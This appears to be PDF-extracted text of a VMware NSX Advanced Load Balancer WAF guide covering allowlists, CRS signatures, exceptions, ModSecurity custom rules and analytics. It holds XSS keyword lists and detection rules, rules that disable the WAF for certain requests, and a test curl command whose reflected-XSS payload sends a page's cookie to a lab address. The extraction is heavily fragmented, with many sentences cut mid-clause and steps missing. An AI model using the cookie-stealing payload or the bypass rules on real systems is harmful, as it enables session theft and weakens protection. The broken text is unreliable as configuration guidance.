VMware NSX Advanced Load Balancer WAF GuideNote It is recommended to use the automated adjustment of the sampling rate.
This section discusses the Learning Interval
to Application Learning to the NSX Advanced Load Balancer Controller. By default, this duration
is set to 30 minutes. This means that the Service Engines sends data to NSX Advanced Load
Balancer Controller every half an hour for further processing. Based on the learning activities or
the amount of Application Learning data, the value of this parameter can be increased or
decreased.
VMware NSX Advanced Load Balancer WAF Guide
The Allowlist functionality allows the definition of match conditions for requests that will perform
associated actions.
Bypassing WAF when there is a match :n The request comes from a specific IP range.
n Allow access from the internal network.n Run parts of the application in Detection mode.
Configuring Allowlist Rules
This section discusses how to configure Allowlist RulesTo define Allowlist rules do the following:
2 Click on Create Or Edit an existing WAF Policy.
3 Enter the required details under the Settings tab.
4 Click on the Allowlist tab.
VMware NSX Advanced Load Balancer WAF Guide5 Click on the Add Rule button.
Table 2-1. General
Rule Enabled By default, the Allowlist rule is enabled.
Click on the toggle button to disable it, if required. Name Enter a relevant name for the rule.
Description Enter a description to define the rule.
Table 2-2. Match
Add Match Type Select a Match Type from the options:
n Client IP
n HTTP Method
n Path
n Host Header
VMware NSX Advanced Load Balancer WAF GuideTable 2-3. Action
Action From the following options, select the action to be
performed when the request matches the criteria
specified:
n Bypass: When Bypass is selected, WAF does not
execute any further rules and the request is allowed.
n Continue: Selecting Continue, stops the allowlist
execution and directs WAF to continue its activity.
n Detection Mode: When set the WAF Engine will be set
to Detection Mode for that request.The New Allowlist Rule screen is as shown below:
VMware NSX Advanced Load Balancer WAF Guide
VMware NSX Advanced Load Balancer WAF Guide
This section discusses the Match Type
Use this match type to select a trusted list of client IPs or client IP groups.To configure a match rule for the client IPs:
1 Select the match type as Client IP under Add Match Type.
2 Select Is or Is Not to provide permissions accordingly.
3 Click on the drop down under Method.
article.
Use this to select only specific types of HTTP requests using the HTTP request methods like GET,
CONNECT, DELETE, and more.
VMware NSX Advanced Load Balancer WAF GuideTo define allowlisting rules based on HTTP Method follow the below:
2 Select Is or Is Not to provide permissions accordingly.
3 Select the Methods as shown below:
To allowlist URLs follow the below :1 Select the match type as Path under Add Match Type.
2 Select the Criteria which needs to be matched in the URL.
3 Enter the String Value in String group or custom string
4 Select Match Case to enable case sensitivity.
Use this method to apply rules to only requests that match the specified host header criterion.To allowlist Host Headers do the below :
2 Select the Criteria which needs to be matched in the URL
VMware NSX Advanced Load Balancer WAF Guide3 Enter the String Value
Sampling Traffic to WAF Allowlist
This section discusses Sampling Traffic to WAF Allowlist
particular percentage of traffic for WAF allowlisting. It is beneficial only if we want to send a
subset of all traffic through WAF. The sampling_rate flag is used to allot a range for each allowlist
rule. The sampling_rate value can range from 0 to 100%.
example if sampling is set to 50 %, then every other request will trigger the action.
Example 1Consider the following configuration:
n Match client IP address: 1.2.3.4
WAF), the other 90% of them will continue to the next allowlist rule.
to WAF, the rules can be written like this:n Sampling percentage: 100
n Sampling percentage: 100
VMware NSX Advanced Load Balancer WAF GuidePartial Buffering for Chuncked Mode Encoding
This section discusses Partial Buffering for Chuncked Mode Encoding
with chunked-encoding was supported.
is supported. The remaining payload is streamed while maintaining the original chunk boundaries
sent from the client.Support for IP Groups in Allowlist
This section dicusses Support for IP Groups in Allowlist
were supported while configuring allowlist. Starting with NSX Advanced Load Balancer release
20.1.3, configuration using IP groups is also supported for allowlist.Configuring Using NSX Advanced Load Balancer
This section explains how to configure an IP group and use it in a WAF allowlist for making all
requests from IPs in the IP group called Trusted IPs bypass WAF checks. a Provide the required name.
VMware NSX Advanced Load Balancer WAF Guide
creating a new allowlist rule.
VMware NSX Advanced Load Balancer WAF Guide
VMware NSX Advanced Load Balancer WAF Guide
bypass for any client IP address which is part of the IP address group created in the previous
step.Positive Security and Learning
This section discusses Positive Security and Learning feature for WAF.
Learning Engine, scanner import or manually. A Positive Security rule will match when the request
(or parts of the request) matches the behaviour defined in the rules. This is in contrast to
Signatures, which describe attack patterns and will match when an attack pattern is found.n Mode (Detection / Enforcement) by rule
n Paranoia levels of rules
Reasons for Using the Positive Security Model
n As Positive Security is defining application behaviour it can reduce the attack surface by only
allowing known good traffic.
a long list of known attacks, the validation is against a single expression.Configuring Positive Security Group
This section discusses how to configure Positive Security GroupConfigure Positive Security Group
To create a Positive Security group, follow the below steps:
VMware NSX Advanced Load Balancer WAF Guide2 Click on Create or Edit an existing WAF Policy.
3 Enter the required details under the Settings tab.
4 Click on the Positive Security tab.
option avaiable next to Add Positive Security group Field Description Additional Information
Name Enter a relevant name for the
policy. Description Enter a description to identify the
group. Learning Group Select this option to enable the
group for learning.
VMware NSX Advanced Load Balancer WAF Guide Field Description Additional Information
No operation from the drop down. match_value pattern, this action will
be executed. Allowed actions are
WAF_ACTION_NO_OP and
WAF_ACTION_ALLOW_PARAMETE
R.
from the drop down. match the match_value pattern, this
action will be executed. Allowed
actions are WAF_ACTION_NO_OP
and WAF_ACTION_BLOCK. Location Click on Add Location to create a Rules are created in locations.
new location. Locations are derived from URLs.
This section discusses Creating a LocationEnter details in the New Location screen as shown below:
1 Enter a unique Name to identify the location.
2 Enter the Description.
3 Select a Match Type, for example: Path.
5 Enter the String Value in String group or custom string.
6 Select Match Case to enable case sensitivity.
VMware NSX Advanced Load Balancer WAF GuideCreating an Argument Rule
This section discusses Creating an Argument RuleIn the New Argument Rule screen, do the following:
VMware NSX Advanced Load Balancer WAF Guide
default. The Rule Enabled option is enabled by default2 Enter a unique Rule ID.
3 Enter the rule Name.
4 Enter a Description for the rule.
used. For the policy mode to take effect, the WAF policy should allow delegation.
Any rule configured to intercept HTTP transactions will be bypassed.
the rules configured.
Paranoia level to the rule is optional. It is recommended to leave the paranoia level value at 1.7 Define the Match Elements as shown below:
value. To know more about Match Value Pattern refer to String Groups Support.
same case as specified in the match value pattern.
VMware NSX Advanced Load Balancer WAF Guide a In the field Name, select the variable specification.
b Enter a Sub Element.
Name and Sub Element. The New Argument Rule screen is as below:
VMware NSX Advanced Load Balancer WAF Guide
Selecting a Paranoia Mode
This section discusses Selecting a Paranoia Mode
VMware NSX Advanced Load Balancer WAF GuideThe available paranoia modes are:
n 1- Low (Default and recommended mode)
n Risk level of an application.
n Resources available for policy tuning.
High application risk level High paranoia mode
Low application risk level Low paranoia mode
Resources available for tuning Higher paranoia mode
Limited resources available for tuning Lower paranoia mode
String Groups Support
Starting with NSX Advanced Load Balancer release 20.1.3, string groups are supported in
addition to the match value pattern as mentioned in the previous section. The string group
consists of the followings:n Key – PCRE-supported regular expression.
Argument rule is as shown below:
VMware NSX Advanced Load Balancer WAF Guide
create a new string group.
VMware NSX Advanced Load Balancer WAF Guide
VMware NSX Advanced Load Balancer WAF Guide
and click on the Add Map option as shown below:
VMware NSX Advanced Load Balancer WAF Guide
VMware NSX Advanced Load Balancer WAF Guide
100. A string group supports a maximum of 1000 key values.Deploying WAF Signatures
WAF signatures is one of the security services delivered through Pulse. WAF signature service is
based on Opt-In basis, which is disabled by default.
vulnerabilities as identified by Open Web Application Security Project (OWASP), such as SQL
Injection (SQLi) and Cross-site Scripting (XSS), while providing the ability to customize the
rule set for each application.
management process.
portal. For more information refer to Pulse and WAF Core Rule Set.
VMware NSX Advanced Load Balancer WAF Guide
it.Automated WAF Signatures Update
You can check Auto Download WAF Signatures option in Opt-In settings window to deploy
automatically. It is required to register the controller to Avi Pulse to select the opt-in options to
enable the feature. For more information refer to Pulse.
Pulse Opt-in page.
VMware NSX Advanced Load Balancer WAF GuideManual WAF Signatures Update
You can check WAF Signatures Notifications option in Opt-In settings window to receive a
notification when new Signatures are available.
Controller will not deploy the latest data automatically on it, instead an event with download link
to download the data file will be generated. n Navigate to Templates > WAF > CRS.
n Click on Upload File button to upload WAF signature files.
VMware NSX Advanced Load Balancer WAF GuideSignatures CRS rules
In this section the NSX supplied OWASP CRS policy can be configured. It covers the OWASP Top
Ten attack protection.
update the CRS ruleset without any risk in production. However, these new rules must be moved
into Enforcement mode (or inherited policy mode) manually.
applied to the rules.To update CRS Rules do the following:
VMware NSX Advanced Load Balancer WAF Guide2 Click on the required CRS Version to select it.
version.
VMware NSX Advanced Load Balancer WAF GuidePost and Pre-CRS Rules
The final step in WAF processing is a signature check. Core Rule Sets (CRS) can be configured
under the Signatures tab. You can configure to execute custom rules before CRS or after CRS as
well. For more information refer to the below section.
This article shows how to configure pre-CRS.
Pre-CRS rules. For more information refer to Custom Rule Examples.To define Pre-CRS rules do the following:
2 Click on Create Or Edit an existing WAF Policy.
3 Enter the required details under the Settings tab.
4 Click on the Signatures tab.
5 Under Pre-CRS rules, click on Create Group.
VMware NSX Advanced Load Balancer WAF Guide6 Enter the Group Name. Every rule is configured within a group.
7 Click on the Create Rule button.
8 Enter a Name for the rule.
used. For the policy mode to take effect, the WAF Policy should allow delegation.
Any rule configured to intercept HTTP transactions will be bypassed.
the rules configured.10 Enter the Rule in the text box.
VMware NSX Advanced Load Balancer WAF Guide12 Click on the toggle button to enable the rule.
Exceptions are a common way of tuning a WAF policy to work with an application.
VMware NSX Advanced Load Balancer WAF Guide
following are a few other reasons for creating exceptions are:n For false-positive mitigation.
n For applications that do not confirm with the System-WAF-Policy.
HTML content in query parameters.
accessing application on its direct IP address.
you can even add them manually.To define an exception manually,
Exceptions.
Subnet- 10.0.0.0/8, Path- /admin , Match Element - REQUEST_BODY.
exception.Note Exceptions can be created on a group level or a rule level.
The rule configured with exceptions is as shown below:
VMware NSX Advanced Load Balancer WAF Guide
IP and Path will just have ARGS:xyz removed while processing the rule.
VMware NSX Advanced Load Balancer WAF GuideRecommended Assisted Workflow
The following steps are for a recommended workflow to configure exceptions:1 Using WAF Analytics and find possible false-positives.
Add Exception. a The modal dialog will generate a set of suggested values.
3 Save the exception to apply it to the policy.
VMware NSX Advanced Load Balancer WAF Guide
The custom rules that are applied after the supplied OWASP Core Rule Set (CRS) are configured
under Post-CRS rules.To configure post-CRS rules, do the following:
2 Create Groups and Rules as discussed in the Pre-CRS Rulessection.
Mixed Mode and Enabling Mode Delegation
WAF Policy can be configured to operate in either detection only or in enforcement mode.
operate in any of the following three modes:
application log message and the request is allowed through.
Balancer Service Engine, and an application log message is generated.
defined for a single rule, irrespective of the action defined for the rule set. This is also referred to
as the mixed mode, and allows fine tuning to avoid legitimate requests from being blocked, due
to enforcement mode.
The following section discusses a few use cases relevant for enabling Mode Delegation:
mixed mode enabled to avoid false positives. You will be able to introduce new rules to
operate in detection mode, so that legitimate requests are not rejected.
VMware NSX Advanced Load Balancer WAF Guide
the policy in detection mode. With this you will not need to entirely enforce WAF
implementation in detection mode.Enabling Mode Delegation
1 In NSX ALB UI, navigate to Templates > WAF > WAF Policy.2 Click on Create Or Edit an existing WAF Policy.
enable mixed mode.Enabling Policy Mode for a Rule
To enable policy mode for a certain rule, follow the below steps:1 Navigate to the Signatures tab and select the CRS version.
2 Under RULE MODE, select the option as Use policy mode.
VMware NSX Advanced Load Balancer WAF Guide
Best Practices for working with
WAF 3
This section discusses about Best practices for working with WAF.This chapter includes the following topics:
n Vulnerability Scanner (DAST)
n WAF in Anomaly Score Mode
This section explains Creating Exclusions.
WAF rules monitors and controls all requests carried out to the server in order to identify any
malicious content and protect the web application from any potential threat. This process
establishes a barrier, it may restrict authorized users from accessing valuable services.
is flagged for a particular IP then, it is most likely a threat that needs to be blocked or removed.
This section discusses Exclusions in WAF.
the regular traffic of an application and the WAF rules configured matches. Exclusions creates a
balance between paranoia and neglecting real threats caused due to false positives.The below are the few reasons for creating exclusions:
1 Applications do not confirm with the Default-System-Policy.
transferring HTML content in query parameters.
VMware NSX Advanced Load Balancer WAF Guide
accessing the application on their direct IP address.Recommended Assisted Workflow
The steps in mitigating a false positive are as given below:1 Identify a potential false positive.
2 Eliminate the false positive by adding an Exception to the rule.
will be activated immediately.
This sections discusses Creating Exceptions for WAF policies.To Create Exceptions follow the below steps:
like the client IP, URI, the type of request, etc.4 WAF Hits displays all the rules that were matched.
positive remediation.6 Save the exception, so that it can be applied to the policy.
This can be done at the Pre-CRS, CRS, or Post CRS levels.Examples for Creating Exclusions
This sections discusses the examples for Creating Exclusions.In the below example, the HTML is added through the parameters.
Request Match Element False Positive Reason
POST /foo/bar_form.php HTTP/1.1 ARGS:img XSS rules match "<img...
Host: boofar.com
name1=value1&name2=value2&img=<i
mg+src='/images/foo.png'>
VMware NSX Advanced Load Balancer WAF GuideWorkflow for Mitigation
In order to mitigate, exclude the parameters from being checked for XSS (at the rule group level).
The listed below are few examples :1 Admin is aware that the Security Threat level is high.
2 Reason is that many requests are denied.
the offending ARGS:img.
number of denied requests in last day.6 Admin clicks "Generate Exclude"
parameter"Importing the CRS files and CRS Update from NSX
Advanced Load Balancer Portal
This article shows the steps to download the CRS JSON file from the customer portal and upload
it to NSX Advanced Load Balancer. Give the below link
supports currated CRS files that can be downloaded from the customer portal.Download the CRS File
This section describes how to Download the CRS File1 Log in to the NSX customer portal with your credentials.
VMware NSX Advanced Load Balancer WAF Guide3 Click on the CRS Details icon
VMware NSX Advanced Load Balancer WAF Guide
shown below:5 Choose the CRS file and click on the Download icon.
Advanced Load Balancer.Upload the CRS File
This section describes how to Upload the CRS FileTo upload the CRS file do the following:
1 Navigate to Templates > WAF > CRS.
2 Click on the Upload button to upload the CRS file.
VMware NSX Advanced Load Balancer WAF Guide
This article lists out possible use cases for configuring custom rules
custom requirements. Custom security rules are based on the ModSecurity language. For more
information, refer to OWASP ModSecurity Core Rule Set.
to Pre-CRS Rules and Post-CRS Rules.Custom Rules Examples
This section provides a list of examples for Custom Rules.
You can bypass certain requests from going through WAF.The below are the few ways to bypass WAF:
Via Content Length
To bypass WAF if the content length is greater than the defined value.Custom Rule Syntax
request skips WAF. SecRule REQUEST_HEADERS:Content-Length "@gt 1048576"
"phase:1,id:4000100,nolog,pass,ctl:ruleEngine=off"Via Chunked Transfer Encoding
To bypass WAF based on the transfer encoding type.Custom Rule Syntax
SecRule 'Variable "@match criteria"'""
VMware NSX Advanced Load Balancer WAF Guide SecRule REQUEST_HEADERS:Transfer-Encoding "@contains chunked"
"phase:1,id:4000101,nolog,pass,ctl:ruleEngine=off"Based on Specific Patterns of the Requested Path
To bypass WAF according to certain patterns of the requested path.Custom Rule Syntax
SecRule REQUEST_URI “@beginsWith /IDMProv/login.do;jsessionid=”
“id:4000102,phase:1,t:none,pass,ctl:ruleEngine=off”
To whitelist all requests that match certain conditions.Custom Rule Syntax
SecRule 'Variable "@match criteria"'"id:4000104,phase:1,t:none,pass,ctl:ruleEngine=off,chain" SecRule
REMOTE_ADDR "@ipMatch 10.0.0.0/8" "t:none"
Since there are two conditions to be fulfilled, a chain rule is used. SecRule REQUEST_URI "@beginsWith /admin" "id:4000104,phase:1,t:none,pass,ctl:ruleEngine=off,chain"
SecRule REMOTE_ADDR "@ipMatch 10.0.0.0/8" "t:none"Enabling Customisable XSS keywords
WAF protects against XSS attacks. This rule helps to perform a case-insensitive match of the XSS
keywords and blacklist them.Custom Rule Syntax
SecRule 'variable "@pmfromfile xss-keywords.data"' "msg:'Node-Validator Blacklist Keywords',
id:4099802, severity:'CRITICAL', phase:request,
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:lowercase,t:removeNu
lls, rev:'2', ver:'OWASP_CRS/3.0.0', maturity:'1', accuracy:'8', block, ctl:auditLogParts=+E,
capture, tag:'application-multi', tag:'language-multi', tag:'platform-multi', tag:'attack-xss',
tag:'OWASP_CRS/WEB_ATTACK/XSS', tag:'WASCTC/WASC-8', tag:'WASCTC/WASC-22', tag:'OWASP_TOP_10/A3',
tag:'OWASP_AppSensor/IE1', tag:'CAPEC-242', logdata:'Matched Data: %{TX.0} found within %
{MATCHED_VAR_NAME}: %{MATCHED_VAR}', setvar:'tx.msg=%{rule.msg}', setvar:tx.xss_score=+%
{tx.critical_anomaly_score}, setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}, setvar:tx.%
{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}"
VMware NSX Advanced Load Balancer WAF Guide
"@pmfromfile xss-keywords.data" "msg:'Node-Validator Blacklist Keywords', id:4099802,
severity:'CRITICAL', phase:request,
t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:lowercase,t:removeNu
lls, rev:'2', ver:'OWASP_CRS/3.0.0', maturity:'1', accuracy:'8', block, ctl:auditLogParts=+E,
capture, tag:'application-multi', tag:'language-multi', tag:'platform-multi', tag:'attack-xss',
tag:'OWASP_CRS/WEB_ATTACK/XSS', tag:'WASCTC/WASC-8', tag:'WASCTC/WASC-22', tag:'OWASP_TOP_10/A3',
tag:'OWASP_AppSensor/IE1', tag:'CAPEC-242', logdata:'Matched Data: %{TX.0} found within %
{MATCHED_VAR_NAME}: %{MATCHED_VAR}', setvar:'tx.msg=%{rule.msg}', setvar:tx.xss_score=+%
{tx.critical_anomaly_score}, setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}, setvar:tx.%
{rule.id}-OWASP_CRS/WEB_ATTACK/XSS-%{matched_var_name}=%{tx.0}" Create the data file xss-
keywords.datadocument.cookiedocument.write.parentnode.innerhtmlwindow.location-moz-binding<![cdata[
file shown below:<%code>curl -v -b cookies -X GET ‘http://172.20.0.49/vulnerabilities/xss_r/?name=
%3Cscript%3Edocument.location%3D%27http%3A%2F%2F172.20.0.49%2Flogin.php%3F+%27%2520%2Bdocument.cookie
%3C%2Fscript%3E#’</code>
empty (not delete) the xss-keywords.data.Enabling Special Mode for Specific Applications
Some rules will create false positives for certain known applications. To allow the application to
coexist with the CRS, the following rule is used.Custom Rule Syntax
SecRule 'variable"@unconditionalMatch"' "id:4099803,phase:1,pass,setvar:'TX:crs_exclusions_=1'"</code>
VMware NSX Advanced Load Balancer WAF GuideIn this example, Wordpress is added to the CRS exclusion list.
SecRule REMOTE_ADDR "@unconditionalMatch"
"id:4099803,phase:1,pass,setvar:'TX:crs_exclusions_wordpress=1'"Note In addition to this, enable the CRS_903_Application_Specific_Exclusions group. For
example, the CRS_903_Wordpress_Exclusion_Rules as shown below:Allow Other HTTP Methods in WAF
To overwrite the list of HTTP methods allowed in a WAF profile and allow more methods.Custom Rule Syntax
SecRule <variable “@unconditionalMatch">"id:4099804,phase:1,pass,setvar:'tx.allowed_methods=GET HEAD
POST PUT OPTIONS DELETE PATCH'"
“@unconditionalMatch” forces the rule to always return true. SecRule REMOTE_ADDRESS "@unconditionalMatch" "id:4099804,phase:1,pass,setvar:'tx.allowed_methods=GET
HEAD POST PUT OPTIONS DELETE PATCH'"
VMware NSX Advanced Load Balancer WAF GuideMore Examples for Custom Rules
This section provides more examples for Custom Rulesn To all host header entries not in the list.
SecRule REQUEST_HEADERS:Host "!@pm ct-vs1.local ct-vs2.local" "msg:'Found bad hostname in request',
severity:'CRITICAL', id:4913102, rev:'2', phase:request, block, t:none, t:lowercase, ver:'OWASP_CRS/
3.0.0', maturity:'9', accuracy:'9', capture, logdata:'Matched Data: %{TX.0} found within %
{MATCHED_VAR_NAME}: %{MATCHED_VAR}', tag:'application-multi', tag:'language-multi', tag:'platform-
multi', tag:'attack-reputation-scanner', tag:'OWASP_CRS/AUTOMATION/SECURITY_SCANNER', tag:'WASCTC/
WASC-21', tag:'OWASP_TOP_10/A7', tag:'PCI/6.5.10', setvar:'tx.msg=%{rule.msg}',
setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}, setvar:tx.%{rule.id}-OWASP_CRS/AUTOMATION/
SECURITY_SCANNER-%{matched_var_name}=%{matched_var}, setvar:ip.reput_block_flag=1,
expirevar:ip.reput_block_flag=%{tx.reput_block_duration}, setvar:'ip.reput_block_reason=%{rule.msg}'"n To bypass WAF engine for a specific IP address or subnet.
SecRule REMOTE_ADDR "@ipMatch 10.0.0.0/8" "id:10000,phase:1,nolog,pass,ctl:ruleEngine=Off"
n To check the length of an input parameter.
SecRule ARGS:foo "@ge 24" "id:10001,t:length,phase:2,block,log,auditlog,msg:'Size of foo parameter
too big'"n To check for java runtime and getruntime for specific CVE.
SecRule ARGS "@rx java\.lang\.runtime|getruntime" "id:4050100, phase:request, t:none, t:lowercase,
block, msg:'Java Injection found', tag:'application-multi', tag:'language-java', tag:'framework-
spring',tag:'CVE-2018-1273', severity:'CRITICAL'"n To bypass a special parameter for a specific rule.
SecRule REQUEST_URI "@contains /vulnerabilities/fi/"
id:4000088,phase:1,t:none,nolog,pass,ctl:ruleRemoveTargetById=930120;ARGS:pagen To configure positive rule in modsec.
SecRule ARGS:id "!@rx ^[0-9]+$" id:12345,phase:2,t:none,block,log,auditlog,msg:'id is not a number'
n To test XXE via Custom Rule.
SecRule REQBODY_PROCESSOR "@streq xml" id:4099801,phase:2,t:none,t:trim,t:lowercase,block,chain
SecRule REQUEST_BODY "@rx <!ENTITY\s+[^>\s]*\s+SYSTEM"n To use detectSQL Operator on last path element.
<%code> SecRule REQUEST_FILENAME “@rx ^/(?:[^/]/)(.*)$” \ “id:4099819,\ phase:2,\ block,\ capture,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,\ msg:’SQL Injection Attack Detected via
libinjection’,\ logdata:’Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}’,\
tag:’application-multi’,\ tag:’language-multi’,\ tag:’platform-multi’,\ tag:’attack-sqli’,\
tag:’OWASP_CRS/WEB_ATTACK/SQL_INJECTION’,\ tag:’WASCTC/WASC-19’,\ tag:’OWASP_TOP_10/A1’,\
tag:’OWASP_AppSensor/CIE1’,\ tag:’PCI/6.5.2’,\ tag:’paranoia-level/3’,\ ver:’OWASP_CRS/3.1.0’,\
severity:’CRITICAL’,\ chain” SecRule TX:1 “@detectSQLi” \ “setvar:’tx.anomaly_score_pl3=+%
VMware NSX Advanced Load Balancer WAF Guide
setvar:’tx.msg=%{rule.msg}’,\ setvar:’tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/SQL_INJECTION-%
{MATCHED_VAR_NAME}=%{MATCHED_VAR}’” </code>n To Detect HTTP DeSync attack.
SecRule &REQUEST_HEADERS:Content-Length "@gt 0" "id:4099820,phase:1,t:none,block,msg:'HTTP Desync
attack detected',chain" SecRule REQUEST_HEADERS:Transfer-Encoding "@contains chunked"
"t:none,t:lowercase"Vulnerability Scanner (DAST)
A Dynamic Application Security Testing (DAST) scanner is a tool to identify potential security
issues in applications.
scanner results. The imported results are used to construct WAF Policy that protects from the
security threats found by the scanner. The technique is often called virtual patching.NSX Advanced Load Balancer supports the following DAST scanners:
n OWASP ZAP Attack Proxy
n Qualys Web App Scanning
This section discusses the steps to integrate DASTThe following are the steps to integrate DAST:
1 Run a scan against a web application not protected by WAF.
Policy rules. Enable WAF.
rules. It creates a WAF Policy Positive Security group containing all the rules covering DAST scan
issues. The avi-iwaf-vpatch.py automatically creates Positive Security locations for each
vulnerable URL reported by the scanner, and Positive Security rules for each supported issue.
found. The script will generate rules related to parameter security, for instance, URL parameters,
HTML form fields and XML or JSON attributes.
in the DAST directory.
VMware NSX Advanced Load Balancer WAF Guide
You can use the following format for python:avi-iwaf-vpatch.py PARAMETERS FILENAME
Therefore, the PARAMETERS are as below:
n -c — hostname or IP address of the Avi Controller to connect to
n -u — username to log in to Avi Controller
n -g — (optional) iWAF Policy PSM group name
n -f — force apply changes
FILENAME is a DAST scan output in XML format.
–force is set, the system will attempt to connect to the NSX Advanced Load Balance Controller
and write WAF Policy. If group name is not specified using -g then the system will create a group
named zap or qualysweb, depending on the scanner being used. Scanner type is auto detected
based on the XML file format.
python ./avi-iwaf-vpatch.py -c 127.0.0.1 -g zap_group ./zap_results.xml --verboseLimitations DAST scanner integration
This section explain the limitation of the import script and manual changes that can be applied.
Many of them may be beyond the scope of WAF. However, some of them can be mitigated by
appropriate settings in NSX Advanced Load Balancer. The examples are as below :1 Issues related to clickjacking can be mitigated by adding a X-Frame-Options HTTP header.
Header option.
“Cookie Does Not Contain The ‘secure’ Attribute”. These could be set by selecting
appropriate options in the Application Profile/Security.WAF in Anomaly Score Mode
This section explains how anomaly scoring mode works.
VMware NSX Advanced Load Balancer WAF Guide
default. Here, the policy flags or rejects a request based on the match of a rule. Alternatively, the
anomaly scoring mode can be used. For more information refer to WAF Mode and WAF Policy
All the rules that match add up to a request-based threshold. If that threshold is reached, the
request will be blocked.
setvar:tx.xss_score_threshold=15,
setvar:tx.rfi_score_threshold=5,
setvar:tx.lfi_score_threshold=5,
setvar:tx.rce_score_threshold=5,
setvar:tx.command_injection_score_threshold=5,
setvar:tx.php_injection_score_threshold=5,
setvar:tx.http_violation_score_threshold=5,
setvar:tx.trojan_score_threshold=5,
setvar:tx.session_fixation_score_threshold=5,
setvar:tx.inbound_anomaly_score_threshold=5,
setvar:tx.outbound_anomaly_score_threshold=4The most frequently used threshold is inbound_anomaly_score_threshold, which is used to deny in
the default CRS rule 949110 - inbound anomaly score.
setvar:tx.error_anomaly_score=4,
setvar:tx.warning_anomaly_score=3,
setvar:tx.notice_anomaly_score=2"
specific thresholds.For example: 931120. Check for RFI (3/4).
threshold tx.anomaly_score and trigger a deny if it was reached. SecRule TX:ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_threshold}"
"msg:'Inbound Anomaly Score Exceeded (Total Score:
%{TX.ANOMALY_SCORE})', severity:CRITICAL, phase:request,
id:949110, t:none, deny, log, tag:'application-multi',
tag:'language-multi', tag:'platform-multi', tag:'attack-generic',
VMware NSX Advanced Load Balancer WAF Guide
setvar:tx.inbound_anomaly_score=%{tx.anomaly_score}"A log file entry is created.
To view the log, follow the below steps:
1 Navigate to Applications > Virtual Services.2 Click on the virtual service mapped to the WAF policy.
Setting Up WAF in Anomaly Scoring mode
This section discusses Setting Up WAF in Anomaly Scoring mode.Changing the Default Behaviour of WAF Profile
action. Block will trigger the rule engine to execute the default action mentioned in the WAF
profile attached to the policy. This default action contains the deny action that will then trigger
the flag (detection) or reject (enforcement) of the request.For example: Default Action: phase:1,pass,status:403,log,auditlog.
WAF handling.To modify the default action follow the below steps:
VMware NSX Advanced Load Balancer WAF Guide2 Click on the Edit icon against the required policy.
Changing individual thresholds and blocking of different threshold variables (by
group, for example)
Every threshold or score variable can be changed by using Pre-CRS custom rule. SecRule REMOTE_ADDR "@unconditionalMatch" "id:4099803,phase:1,pass,setvar:tx.rfi_score_threshold=2"
For blocking by using different thresholds, a custom Post-CRS rule is required.
score.This rule is a good example for the blocking rule.
SecRule TX:RFI_SCORE "@ge %{tx.rfi_score_threshold}""msg:'Inbound
RFI-Anomaly Score Exceeded (Total Score: %{tx.rfi_score})',
severity:CRITICAL,phase:request,id:1949110,t:none,
deny,log,tag:'application-multi',tag:'language-multi',
tag:'platform-multi',tag:'attack-generic',
setvar:tx.inbound_tx_msg=%{tx.msg}"Similar rules can be created for all other groups of attacks.
“:” (colon).
this is not done correctly, the rule will not match as intended.
VMware NSX Advanced Load Balancer WAF GuideSample Test Case
Create any request with the ARGS payload, for example, https://abc-eval-test.net/am-test
Analytics and Insights
4
This document discusses options available on NSX Advanced Load Balancer to monitor intelligent
web application firewall (WAF) under the following sections:n WAF Log Analytics
This chapter includes the following topics:
n WAF Log Analytics
WAF Log Analytics
This section discusses the WAF Logs Analytics available for virtual service on NSX Advanced
Load Balancer.
the log files follow the below:1 Navigate to Applications > Virtual Services.
2 ClickVirtual Service mapped to the WAF policy and navigate to Logs.
populate the available options.
VMware NSX Advanced Load Balancer WAF GuideThese filters can be used for WAF Analytics as well.
Analyzing WAF Logs Analytics
The following are the fields in WAF Logs Analytics entry:n Timestamp: Time of capturing the log.
n Client IP: IP address of the client.
n URI: URL of the evaluated traffic.
n Request: Request type
n Response: Response code.
n Length: Size of the response body.
n Duration/Timeline: Duration of the traffic.
This column in the WAF Logs Analytics entry refers to the result of WAF evaluation. The
following are the possible outcomes:n REJECTED: Policy is in enforcement mode and the request was rejected.
n PASSED: Request passed the WAF policy without any match.
n Not applicable :The request was not evaluated by WAF.
VMware NSX Advanced Load Balancer WAF GuideDetailed log information
Clicking on the + sign at the end of each log entry will expand the panel to provide more details.n Significance: Indicates WAF policy match.
rejected or not.
entry consisting of the following fields: n All tags assigned to the rule
VMware NSX Advanced Load Balancer WAF Guide
exception for a false-positive remediation.
activated immediately.
The section explains WAF Analytics1 Navigate to Applications > Virtual Services.
2 Click on the virtual service mapped to the WAF policy.
based on the time frame chosen, such as Displaying Past Week, Displaying Past 6 Hours, etc. The
new WAF log analytics items can now be used in conjunction with the already existent analytics.
VMware NSX Advanced Load Balancer WAF Guide
filter along with CRS_949_Anomaly_Evaluations rule group under WAF Groups in the Analytics
tab.
Overview of the tags that were hit during the selected time frame.
Overview of the rules that were hit during the selected time frame.
VMware NSX Advanced Load Balancer WAF Guide
Overview of the groups that were hit during the selected time frame. Groups can be expanded to
show the distribution by rule.
VMware NSX Advanced Load Balancer WAF Guide
Summary of the latency in microsecond for the log entries in a given time frame.
This section discusses WAF Metrics.To view WAF related metrics do the follow:
1 Navigate to Applications > Virtual Services.
denied requests and their corresponding trigger.
VMware NSX Advanced Load Balancer WAF Guide
positive, any rule or group can be disabled, by using the toggle button.
Combinations displays the known combinations and their hit counts related to the chosen filter.
The filter can be reset by clicking on Reset filters.
This section discusses Preview Exceptions
for the selected combination.1 Click Preview Exception to view the exception on the right-side pane.
immediately.
of the filter.
shown below:
VMware NSX Advanced Load Balancer WAF Guide
This section explains Preview logs
button.
elements that are selected.Viewing Events for Debugging WAF Signature
You can view events for debugging WAF signature issues as follows:
VMware NSX Advanced Load Balancer WAF Guide
FAQ's
5
Frequently Asked Questions and Answer are as below :What are the traditional WAF’s challenges that NSX ALB
has tried to solve?
